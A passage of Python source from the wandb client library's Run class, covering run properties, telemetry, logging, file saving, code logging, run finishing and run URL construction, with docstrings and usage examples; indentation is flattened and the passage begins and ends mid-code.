if sweep_config:
self._config.update_locked(
sweep_config, user="sweep", _allow_val_change=True
)
if (
self._settings.launch
and self._settings.launch_config_path
and os.path.exists(self._settings.launch_config_path)
):
self.save(self._settings.launch_config_path)
with open(self._settings.launch_config_path) as fp:
launch_config = json.loads(fp.read())
if launch_config.get("overrides", {}).get("artifacts") is not None:
for key, item in (
launch_config.get("overrides").get("artifacts").items()
):
self._launch_artifact_mapping[key] = item
artifact_sequence_tuple_or_slot = key.split(":")
if len(artifact_sequence_tuple_or_slot) == 2:
sequence_name = artifact_sequence_tuple_or_slot[0].split("/")[
-1
]
if self._unique_launch_artifact_sequence_names.get(
sequence_name
):
self._unique_launch_artifact_sequence_names.pop(
sequence_name
)
else:
self._unique_launch_artifact_sequence_names[
sequence_name
] = item
launch_run_config = launch_config.get("overrides", {}).get("run_config")
if launch_run_config:
self._config.update_locked(
launch_run_config, user="launch", _allow_val_change=True
)
self._config._update(config, ignore_locked=True)
self._atexit_cleanup_called = False
self._use_redirect = True
self._progress_step = 0
# pid is set so we know if this run object was initialized by this process
self._init_pid = os.getpid()
# interface pid and port configured when backend is configured (See _hack_set_run)
# TODO: using pid isnt the best for windows as pid reuse can happen more often than unix
self._iface_pid = None
self._iface_port = None
self._attach_id = None
# for now, use runid as attach id, this could/should be versioned in the future
if self._settings._require_service:
self._attach_id = self._settings.run_id
def _set_iface_pid(self, iface_pid: int) -> None:
self._iface_pid = iface_pid
def _set_iface_port(self, iface_port: int) -> None:
self._iface_port = iface_port
def _telemetry_callback(self, telem_obj: telemetry.TelemetryRecord) -> None:
self._telemetry_obj.MergeFrom(telem_obj)
def _freeze(self) -> None:
self._frozen = True
def __setattr__(self, attr: str, value: object) -> None:
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp: telemetry.TelemetryImports) -> None:
telem_map = dict(
pytorch_ignite="ignite", transformers_huggingface="transformers",
)
# calculate mod_map, a mapping from module_name to telem_name
mod_map = dict()
for desc in imp.DESCRIPTOR.fields:
if desc.type != desc.TYPE_BOOL:
continue
telem_name = desc.name
mod_name = telem_map.get(telem_name, telem_name)
mod_map[mod_name] = telem_name
# set telemetry field for every module loaded that we track
mods_set = set(sys.modules)
for mod in mods_set.intersection(mod_map):
setattr(imp, mod_map[mod], True)
def _init_from_settings(self, settings: Settings) -> None:
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
def _make_proto_run(self, run: RunRecord) -> None:
"""Populate protocol buffer RunData for interface/interface."""
if self._entity is not None:
run.entity = self._entity
if self._project is not None:
run.project = self._project
if self._group is not None:
run.run_group = self._group
if self._job_type is not None:
run.job_type = self._job_type
if self._run_id is not None:
run.run_id = self._run_id
if self._name is not None:
run.display_name = self._name
if self._notes is not None:
run.notes = self._notes
if self._tags is not None:
for tag in self._tags:
run.tags.append(tag)
if self._start_time is not None:
run.start_time.FromSeconds(int(self._start_time))
if self._remote_url is not None:
run.git.remote_url = self._remote_url
if self._last_commit is not None:
run.git.last_commit = self._last_commit
# Note: run.config is set in interface/interface:_make_run()
def _populate_git_info(self) -> None:
try:
repo = GitRepo(remote=self._settings.git_remote, lazy=False)
except Exception:
wandb.termwarn("Cannot find valid git repo associated with this directory.")
return
self._remote_url, self._last_commit = repo.remote_url, repo.last_commit
def __getstate__(self) -> Any:
"""Custom pickler."""
# We only pickle in service mode
if not self._settings or not self._settings._require_service:
return
_attach_id = self._attach_id
if not _attach_id:
return
return dict(_attach_id=_attach_id)
def __setstate__(self, state: Any) -> None:
"""Custom unpickler."""
if not state:
return
_attach_id = state.get("_attach_id")
if not _attach_id:
return
self._attach_id = _attach_id
@property
def settings(self) -> Settings:
"""Returns a frozen copy of run's Settings object."""
cp = self._settings.copy()
cp.freeze()
return cp
@property
def dir(self) -> str:
"""Returns the directory where files associated with the run are saved."""
return self._settings.files_dir
@property
def config(self) -> wandb_config.Config:
"""Returns the config object associated with this run."""
return self._config
@property
def config_static(self) -> wandb_config.ConfigStatic:
return wandb_config.ConfigStatic(self._config)
@property
def name(self) -> Optional[str]:
"""Returns the display name of the run.
Display names are not guaranteed to be unique and may be descriptive.
By default, they are randomly generated.
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
@name.setter
def name(self, name: str) -> None:
with telemetry.context(run=self) as tel:
tel.feature.set_run_name = True
self._name = name
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def notes(self) -> Optional[str]:
"""Returns the notes associated with the run, if there are any.
Notes can be a multiline string and can also use markdown and latex equations
inside `$$`, like `$x + 3$`.
"""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
@notes.setter
def notes(self, notes: str) -> None:
self._notes = notes
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def tags(self) -> Optional[Tuple]:
"""Returns the tags associated with the run, if there are any."""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
@tags.setter
def tags(self, tags: Sequence) -> None:
with telemetry.context(run=self) as tel:
tel.feature.set_run_tags = True
self._tags = tuple(tags)
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def id(self) -> str:
"""Returns the identifier for this run."""
if TYPE_CHECKING:
assert self._run_id is not None
return self._run_id
@property
def sweep_id(self) -> Optional[str]:
"""Returns the ID of the sweep associated with the run, if there is one."""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self) -> str:
"""Returns the path to the run.
Run paths include entity, project, and run ID, in the format
`entity/project/run_id`.
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self) -> float:
"""Returns the unix time stamp, in seconds, when the run started."""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self) -> int:
"""Returns the first step of the run."""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self) -> bool:
"""Returns True if the run was resumed, False otherwise."""
if self._run_obj:
return self._run_obj.resumed
return False
@property
def step(self) -> int:
"""Returns the current value of the step.
This counter is incremented by `wandb.log`.
"""
return self.history._step
def project_name(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
@property
def mode(self) -> str:
"""For compatibility with `0.9.x` and earlier, deprecate eventually."""
deprecate.deprecate(
field_name=deprecate.Deprecated.run__mode,
warning_message=(
"The mode property of wandb.run is deprecated "
"and will be removed in a future release."
),
)
return "dryrun" if self._settings._offline else "run"
@property
def offline(self) -> bool:
return self._settings._offline
@property
def disabled(self) -> bool:
return self._settings._noop
@property
def group(self) -> str:
"""Returns the name of the group associated with the run.
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing a distributed training you should give all of the
runs in the training the same group.
If you are doing crossvalidation you should give all the crossvalidation
folds the same group.
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
@property
def project(self) -> str:
"""Returns the name of the W&B project associated with the run."""
return self.project_name()
def log_code(
self,
root: str = ".",
name: str = None,
include_fn: Callable[[str], bool] = lambda path: path.endswith(".py"),
exclude_fn: Callable[[str], bool] = filenames.exclude_wandb_fn,
) -> Optional[Artifact]:
"""Saves the current state of your code to a W&B Artifact.
By default it walks the current directory and logs all files that end with `.py`.
Arguments:
root: The relative (to `os.getcwd()`) or absolute path to recursively find code from.
name: (str, optional) The name of our code artifact. By default we'll name
the artifact `source-$RUN_ID`. There may be scenarios where you want
many runs to share the same artifact. Specifying name allows you to achieve that.
include_fn: A callable that accepts a file path and
returns True when it should be included and False otherwise. This
defaults to: `lambda path: path.endswith(".py")`
exclude_fn: A callable that accepts a file path and returns `True` when it should be
excluded and `False` otherwise. Thisdefaults to: `lambda path: False`
Examples:
Basic usage
```python
run.log_code()
```
Advanced usage
```python
run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
```
Returns:
An `Artifact` object if code was logged
"""
name = name or "{}-{}".format("source", self.id)
art = wandb.Artifact(name, "code")
files_added = False
if root is not None:
root = os.path.abspath(root)
for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
files_added = True
save_name = os.path.relpath(file_path, root)
art.add_file(file_path, name=save_name)
# Add any manually staged files such is ipynb notebooks
for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
for fname in files:
file_path = os.path.join(dirpath, fname)
save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
files_added = True
art.add_file(file_path, name=save_name)
if not files_added:
return None
return self.log_artifact(art)
def get_url(self) -> Optional[str]:
"""Returns the url for the W&B run, if there is one.
Offline runs will not have a url.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_run_url()
def get_project_url(self) -> Optional[str]:
"""Returns the url for the W&B project associated with the run, if there is one.
Offline runs will not have a project url.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_project_url()
def get_sweep_url(self) -> Optional[str]:
"""Returns the url for the sweep associated with the run, if there is one."""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_sweep_url()
@property
def url(self) -> Optional[str]:
"""Returns the W&B url associated with the run."""
return self.get_url()
@property
def entity(self) -> str:
"""Returns the name of the W&B entity associated with the run.
Entity can be a user name or the name of a team or organization.
"""
return self._entity or ""
def _label_internal(
self, code: str = None, repo: str = None, code_version: str = None
) -> None:
with telemetry.context(run=self) as tel:
if code and RE_LABEL.match(code):
tel.label.code_string = code
if repo and RE_LABEL.match(repo):
tel.label.repo_string = repo
if code_version and RE_LABEL.match(code_version):
tel.label.code_version = code_version
def _label(
self,
code: str = None,
repo: str = None,
code_version: str = None,
**kwargs: str,
) -> None:
if self._settings.label_disable:
return
for k, v in (("code", code), ("repo", repo), ("code_version", code_version)):
if v and not RE_LABEL.match(v):
wandb.termwarn(
"Label added for '{}' with invalid identifier '{}' (ignored).".format(
k, v
),
repeat=False,
)
for v in kwargs:
wandb.termwarn(
"Label added for unsupported key '{}' (ignored).".format(v),
repeat=False,
)
self._label_internal(code=code, repo=repo, code_version=code_version)
# update telemetry in the backend immediately for _label() callers
if self._backend and self._backend.interface:
self._backend.interface._publish_telemetry(self._telemetry_obj)
def _label_probe_lines(self, lines: List[str]) -> None:
if not lines:
return
parsed = telemetry._parse_label_lines(lines)
if not parsed:
return
label_dict = {}
code = parsed.get("code") or parsed.get("c")
if code:
label_dict["code"] = code
repo = parsed.get("repo") or parsed.get("r")
if repo:
label_dict["repo"] = repo
code_ver = parsed.get("version") or parsed.get("v")
if code_ver:
label_dict["code_version"] = code_ver
self._label_internal(**label_dict)
def _label_probe_main(self) -> None:
m = sys.modules.get("__main__")
if not m:
return
doc = getattr(m, "__doc__", None)
if not doc:
return
doclines = doc.splitlines()
self._label_probe_lines(doclines)
# TODO: annotate jupyter Notebook class
def _label_probe_notebook(self, notebook: Any) -> None:
logger.info("probe notebook")
lines = None
try:
data = notebook.probe_ipynb()
cell0 = data.get("cells", [])[0]
lines = cell0.get("source")
# kaggle returns a string instead of a list
if isinstance(lines, str):
lines = lines.split()
except Exception as e:
logger.info("Unable to probe notebook: {}".format(e))
return
if lines:
self._label_probe_lines(lines)
def display(self, height: int = 420, hidden: bool = False) -> bool:
"""Displays this run in jupyter."""
if self._settings._jupyter and ipython.in_jupyter():
ipython.display_html(self.to_html(height, hidden))
return True
else:
wandb.termwarn(".display() only works in jupyter environments")
return False
def to_html(self, height: int = 420, hidden: bool = False) -> str:
"""Generates HTML containing an iframe displaying the current run."""
url = self._get_run_url() + "?jupyter=true"
style = f"border:none;width:100%;height:{height}px;"
prefix = ""
if hidden:
style += "display:none;"
prefix = ipython.toggle_button()
return prefix + f'<iframe src="{url}" style="{style}"></iframe>'
def _repr_mimebundle_(
self, include: Any = None, exclude: Any = None
) -> Dict[str, str]:
return {"text/html": self.to_html(hidden=True)}
def _config_callback(
self,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
data: Dict[str, object] = None,
) -> None:
logger.info("config_cb %s %s %s", key, val, data)
if not self._backend or not self._backend.interface:
return
self._backend.interface.publish_config(key=key, val=val, data=data)
def _set_config_wandb(self, key: str, val: Any) -> None:
self._config_callback(key=("_wandb", key), val=val)
def _summary_update_callback(self, summary_record: SummaryRecord) -> None:
if self._backend and self._backend.interface:
self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self) -> Dict[str, Any]:
if not self._backend or not self._backend.interface:
return {}
ret = self._backend.interface.communicate_get_summary()
if not ret:
return {}
return proto_util.dict_from_proto_list(ret.item)
def _metric_callback(self, metric_record: MetricRecord) -> None:
if self._backend and self._backend.interface:
self._backend.interface._publish_metric(metric_record)
def _datatypes_callback(self, fname: str) -> None:
if not self._backend or not self._backend.interface:
return
files = dict(files=[(glob.escape(fname), "now")])
self._backend.interface.publish_files(files)
# TODO(jhr): codemod add: PEP 3102 -- Keyword-Only Arguments
def _history_callback(self, row: Dict[str, Any], step: int) -> None:
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
if self._backend and self._backend.interface:
not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
self._backend.interface.publish_history(
row, step, publish_step=not_using_tensorboard
)
def _console_callback(self, name: str, data: str) -> None:
# logger.info("console callback: %s, %s", name, data)
if self._backend and self._backend.interface:
self._backend.interface.publish_output(name, data)
def _tensorboard_callback(
self, logdir: str, save: bool = None, root_logdir: str = None
) -> None:
logger.info("tensorboard callback: %s, %s", logdir, save)
save = True if save is None else save
if self._backend and self._backend.interface:
self._backend.interface.publish_tbdata(logdir, save, root_logdir)
def _set_library(self, library: _WandbSetup) -> None:
self._wl = library
def _set_backend(self, backend: "wandb.sdk.backend.backend.Backend") -> None:
self._backend = backend
def _set_internal_run_interface(
self,
interface: Union[
"wandb.sdk.interface.interface_queue.InterfaceQueue",
"wandb.sdk.interface.interface_grpc.InterfaceGrpc",
],
) -> None:
self._internal_run_interface = interface
def _set_reporter(self, reporter: Reporter) -> None:
self._reporter = reporter
def _set_teardown_hooks(self, hooks: List[TeardownHook]) -> None:
self._teardown_hooks = hooks
def _set_run_obj(self, run_obj: RunRecord) -> None:
self._run_obj = run_obj
self._entity = run_obj.entity
self._project = run_obj.project
# Grab the config from resuming
if run_obj.config:
c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
# TODO: Windows throws a wild error when this is set...
if "_wandb" in c_dict:
del c_dict["_wandb"]
# We update the config object here without triggering the callback
self.config._update(c_dict, allow_val_change=True, ignore_locked=True)
# Update the summary, this will trigger an un-needed graphql request :(
if run_obj.summary:
summary_dict = {}
for orig in run_obj.summary.update:
summary_dict[orig.key] = json.loads(orig.value_json)
self.summary.update(summary_dict)
self.history._update_step()
# TODO: It feels weird to call this twice..
sentry_set_scope(
"user",
entity=run_obj.entity,
project=run_obj.project,
email=self._settings.email,
url=self._get_run_url(),
)
def _set_run_obj_offline(self, run_obj: RunRecord) -> None:
self._run_obj_offline = run_obj
def _add_singleton(
self, data_type: str, key: str, value: Dict[Union[int, str], str]
) -> None:
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling up history with a lot of repeated uneccessary data
Add singleton can be called many times in one run and it will only be
updated when the value changes. The last value logged will be the one
persisted to the server.
"""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if data_type in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
def log(
self,
data: Dict[str, Any],
step: int = None,
commit: bool = None,
sync: bool = None,
) -> None:
"""Logs a dictonary of data to the current run's history.
Use `wandb.log` to log data from runs, such as scalars, images, video,
histograms, plots, and tables.
See our [guides to logging](https://docs.wandb.ai/guides/track/log) for
live examples, code snippets, best practices, and more.
The most basic usage is `wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.
This will save the loss and accuracy to the run's history and update
the summary values for these metrics.
Visualize logged data in the workspace at [wandb.ai](https://wandb.ai),
or locally on a [self-hosted instance](https://docs.wandb.ai/self-hosted)
of the W&B app, or export data to visualize and explore locally, e.g. in
Jupyter notebooks, with [our API](https://docs.wandb.ai/guides/track/public-api-guide).
In the UI, summary values show up in the run table to compare single values across runs.
Summary values can also be set directly with `wandb.run.summary["key"] = value`.
Logged values don't have to be scalars. Logging any wandb object is supported.
For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
example image which will be displayed nicely in the W&B UI.
See the [reference documentation](https://docs.wandb.com/library/reference/data_types)
for all of the different supported types or check out our
[guides to logging](https://docs.wandb.ai/guides/track/log) for examples,
from 3D molecular structures and segmentation masks to PR curves and histograms.
`wandb.Table`s can be used to logged structured data. See our
[guide to logging tables](https://docs.wandb.ai/guides/data-vis/log-tables)
for details.
Logging nested metrics is encouraged and is supported in the W&B UI.
If you log with a nested dictionary like `wandb.log({"train":
{"acc": 0.9}, "val": {"acc": 0.8}})`, the metrics will be organized into
`train` and `val` sections in the W&B UI.
wandb keeps track of a global step, which by default increments with each
call to `wandb.log`, so logging related metrics together is encouraged.
If it's inconvenient to log related metrics together
calling `wandb.log({"train-loss": 0.5, commit=False})` and then
`wandb.log({"accuracy": 0.9})` is equivalent to calling
`wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.
`wandb.log` is not intended to be called more than a few times per second.
If you want to log more frequently than that it's better to aggregate
the data on the client side or you may get degraded performance.
Arguments:
row: (dict, optional) A dict of serializable python objects i.e `str`,
`ints`, `floats`, `Tensors`, `dicts`, or any of the `wandb.data_types`.
commit: (boolean, optional) Save the metrics dict to the wandb server
and increment the step. If false `wandb.log` just updates the current
metrics dict with the row argument and metrics won't be saved until
`wandb.log` is called with `commit=True`.
step: (integer, optional) The global step in processing. This persists
any non-committed earlier steps but defaults to not committing the
specified step.
sync: (boolean, True) This argument is deprecated and currently doesn't
change the behaviour of `wandb.log`.
Examples:
For more and more detailed examples, see
[our guides to logging](https://docs.wandb.com/guides/track/log).
### Basic usage
<!--yeadoc-test:init-and-log-basic-->
```python
import wandb
wandb.init()
wandb.log({'accuracy': 0.9, 'epoch': 5})
```
### Incremental logging
<!--yeadoc-test:init-and-log-incremental-->
```python
import wandb
wandb.init()
wandb.log({'loss': 0.2}, commit=False)
# Somewhere else when I'm ready to report this step:
wandb.log({'accuracy': 0.8})
```
### Histogram
<!--yeadoc-test:init-and-log-histogram-->
```python
import numpy as np
import wandb
# sample gradients at random from normal distribution
gradients = np.random.randn(100, 100)
wandb.init()
wandb.log({"gradients": wandb.Histogram(gradients)})
```
### Image from numpy
<!--yeadoc-test:init-and-log-image-numpy-->
```python
import numpy as np
import wandb
wandb.init()
examples = []
for i in range(3):
pixels = np.random.randint(low=0, high=256, size=(100, 100, 3))
image = wandb.Image(pixels, caption=f"random field {i}")
examples.append(image)
wandb.log({"examples": examples})
```
### Image from PIL
<!--yeadoc-test:init-and-log-image-pillow-->
```python
import numpy as np
from PIL import Image as PILImage
import wandb
wandb.init()
examples = []
for i in range(3):
pixels = np.random.randint(low=0, high=256, size=(100, 100, 3), dtype=np.uint8)
pil_image = PILImage.fromarray(pixels, mode="RGB")
image = wandb.Image(pil_image, caption=f"random field {i}")
examples.append(image)
wandb.log({"examples": examples})
```
### Video from numpy
<!--yeadoc-test:init-and-log-video-numpy-->
```python
import numpy as np
import wandb
wandb.init()
# axes are (time, channel, height, width)
frames = np.random.randint(low=0, high=256, size=(10, 3, 100, 100), dtype=np.uint8)
wandb.log({"video": wandb.Video(frames, fps=4)})
```
### Matplotlib Plot
<!--yeadoc-test:init-and-log-matplotlib-->
```python
from matplotlib import pyplot as plt
import numpy as np
import wandb
wandb.init()
fig, ax = plt.subplots()
x = np.linspace(0, 10)
y = x * x
ax.plot(x, y) # plot y = x^2
wandb.log({"chart": fig})
```
### PR Curve
```python
wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
```
### 3D Object
```python
wandb.log({"generated_samples":
[wandb.Object3D(open("sample.obj")),
wandb.Object3D(open("sample.gltf")),
wandb.Object3D(open("sample.glb"))]})
```
Raises:
wandb.Error: if called before `wandb.init`
ValueError: if invalid data is passed
"""
if not self._settings._require_service:
current_pid = os.getpid()
if current_pid != self._init_pid:
message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
current_pid, self._init_pid
)
if self._settings._strict:
wandb.termerror(message, repeat=False)
raise errors.LogMultiprocessError(
"log() does not support multiprocessing"
)
wandb.termwarn(message, repeat=False)
return
if not isinstance(data, Mapping):
raise ValueError("wandb.log must be passed a dictionary")
if any(not isinstance(key, string_types) for key in data.keys()):
raise ValueError("Key values passed to `wandb.log` must be strings.")
if step is not None:
# if step is passed in when tensorboard_sync is used we honor the step passed
# to make decisions about how to close out the history record, but will strip
# this history later on in publish_history()
using_tensorboard = len(wandb.patched["tensorboard"]) > 0
if using_tensorboard:
wandb.termwarn(
"Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
repeat=False,
)
if self.history._step > step:
wandb.termwarn(
(
"Step must only increase in log calls. "
"Step {} < {}; dropping {}.".format(
step, self.history._step, data
)
)
)
return
elif step > self.history._step:
self.history._flush()
self.history._step = step
elif commit is None:
commit = True
if commit:
self.history._row_add(data)
else:
self.history._row_update(data)
def save(
self,
glob_str: Optional[str] = None,
base_path: Optional[str] = None,
policy: str = "live",
) -> Union[bool, List[str]]:
"""Ensure all files matching `glob_str` are synced to wandb with the policy specified.
Arguments:
glob_str: (string) a relative or absolute path to a unix glob or regular
path. If this isn't specified the method is a noop.
base_path: (string) the base path to run the glob relative to
policy: (string) on of `live`, `now`, or `end`
- live: upload the file as it changes, overwriting the previous version
- now: upload the file once now
- end: only upload file when the run ends
"""
if glob_str is None:
# noop for historical reasons, run.save() may be called in legacy code
deprecate.deprecate(
field_name=deprecate.Deprecated.run__save_no_args,
warning_message=(
"Calling wandb.run.save without any arguments is deprecated."
"Changes to attributes are automatically persisted."
),
)
return True
if policy not in ("live", "end", "now"):
raise ValueError(
'Only "live" "end" and "now" policies are currently supported.'
)
if isinstance(glob_str, bytes):
glob_str = glob_str.decode("utf-8")
if not isinstance(glob_str, string_types):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
if os.path.isabs(glob_str):
base_path = os.path.dirname(glob_str)
wandb.termwarn(
(
"Saving files without folders. If you want to preserve "
"sub directories pass base_path to wandb.save, i.e. "
'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
)
)
else:
base_path = "."
wandb_glob_str = os.path.relpath(glob_str, base_path)
if ".." + os.sep in wandb_glob_str:
raise ValueError("globs can't walk above base_path")
with telemetry.context(run=self) as tel:
tel.feature.save = True
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
wandb.termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str
)
return []
files = glob.glob(os.path.join(self.dir, wandb_glob_str))
warn = False
if len(files) == 0 and "*" in wandb_glob_str:
warn = True
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(self.dir, file_name)
wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
if warn:
file_str = "%i file" % len(files)
if len(files) > 1:
file_str += "s"
wandb.termwarn(
(
"Symlinked %s into the W&B run directory, "
"call wandb.save again to sync new files."
)
% file_str
)
files_dict = dict(files=[(wandb_glob_str, policy)])
if self._backend and self._backend.interface:
self._backend.interface.publish_files(files_dict)
return files
def restore(
self,
name: str,
run_path: Optional[str] = None,
replace: bool = False,
root: Optional[str] = None,
) -> Union[None, TextIO]:
return restore(name, run_path or self.path, replace, root or self.dir)
def finish(self, exit_code: int = None, quiet: Optional[bool] = None) -> None:
"""Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process. We automatically
call this method when your script exits or if you use the run context manager.
Arguments:
exit_code: Set to something other than 0 to mark a run as failed
quiet: Set to true to minimize log output
"""
if quiet is not None:
self._quiet = quiet
with telemetry.context(run=self) as tel:
tel.feature.finish = True
logger.info("finishing run %s", self.path)
# detach jupyter hooks / others that needs to happen before backend shutdown
for hook in self._teardown_hooks:
if hook.stage == TeardownStage.EARLY:
hook.call()
self._atexit_cleanup(exit_code=exit_code)
if self._wl and len(self._wl._global_run_stack) > 0:
self._wl._global_run_stack.pop()
# detach logger / others meant to be run after we've shutdown the backend
for hook in self._teardown_hooks:
if hook.stage == TeardownStage.LATE:
hook.call()
self._teardown_hooks = []
module.unset_globals()
# inform manager this run is finished
manager = self._wl and self._wl._get_manager()
if manager:
manager._inform_finish(run_id=self.id)
def join(self, exit_code: int = None) -> None:
"""Deprecated alias for `finish()` - please use finish."""
deprecate.deprecate(
field_name=deprecate.Deprecated.run__join,
warning_message=(
"wandb.run.join() is deprecated, please use wandb.run.finish()."
),
)
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
table_key: the key used to log the data table
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _set_upgraded_version_message(self, msg: str) -> None:
self._upgraded_version_message = msg
def _set_deleted_version_message(self, msg: str) -> None:
self._deleted_version_message = msg
def _set_yanked_version_message(self, msg: str) -> None:
self._yanked_version_message = msg
def _add_panel(
self, visualize_key: str, panel_type: str, panel_config: dict
) -> None:
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _get_url_query_string(self) -> str:
s = self._settings
# TODO(jhr): migrate to new settings, but for now this is safer
api = internal.Api()
if api.settings().get("anonymous") != "true":
return ""
api_key = apikey.api_key(settings=s)
return "?" + urlencode({"apiKey": api_key})
def _get_project_url(self) -> str:
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), qs
)
return url
def _get_run_url(self) -> str:
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}/runs/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), url_quote(r.run_id), qs
)
return url
def _get_sweep_url(self) -> str:
"""Generate a url for a sweep.
Returns:
(str): url if the run is part of a sweep
(None): if the run is not part of the sweep
"""
r = self._run_obj
if not r:
return ""
sweep_id = r.sweep_id
if not sweep_id:
return ""
app_url = wandb.util.app_url(self._settings.base_url)
qs = self._get_url_query_string()
return "{base}/{entity}/{project}/sweeps/{sweepid}{qs}".format(
base=app_url,
entity=url_quote(r.entity),
project=url_quote(r.project),
sweepid=url_quote(sweep_id),
qs=qs,
)
def _get_run_name(self) -> str:
r = self._run_obj
if not r:
return ""
return r.display_name
def _display_run(self) -> None:
project_url = self._get_project_url()
run_url = self._get_run_url()
sweep_url = self._get_sweep_url()
version_str = f"Tracking run with wandb version {wandb.__version__}"
if self.resumed:
run_state_str = "Resuming run"
else:
run_state_str = "Syncing run"
run_name = self._get_run_name()
sync_dir = self._settings.sync_dir
if self._settings._jupyter:
sync_dir = "<code>{}</code>".format(sync_dir)
dir_str = "Run data is saved locally in {}".format(sync_dir)
if self._settings._jupyter and ipython.in_jupyter():
if not wandb.jupyter.maybe_display():
# TODO: make settings the source of truth
self._quiet = wandb.jupyter.quiet()
sweep_line = (
'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
sweep_url, sweep_url
)
if sweep_url and not self._quiet
else ""
)
docs_html = (
""
if self._quiet
else '(<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">docs</a>)'
) # noqa: E501
project_html = (
""
if self._quiet
else f'<a href="{project_url}" target="_blank">Weights & Biases</a>'
)
ipython.display_html(
"""
{} <strong><a href="{}" target="_blank">{}</a></strong> to {} {}.<br/>\n{}
""".format( # noqa: E501
run_state_str,
run_url,
run_name,
project_html,
docs_html,
sweep_line,
)
)
else:
if not self._quiet:
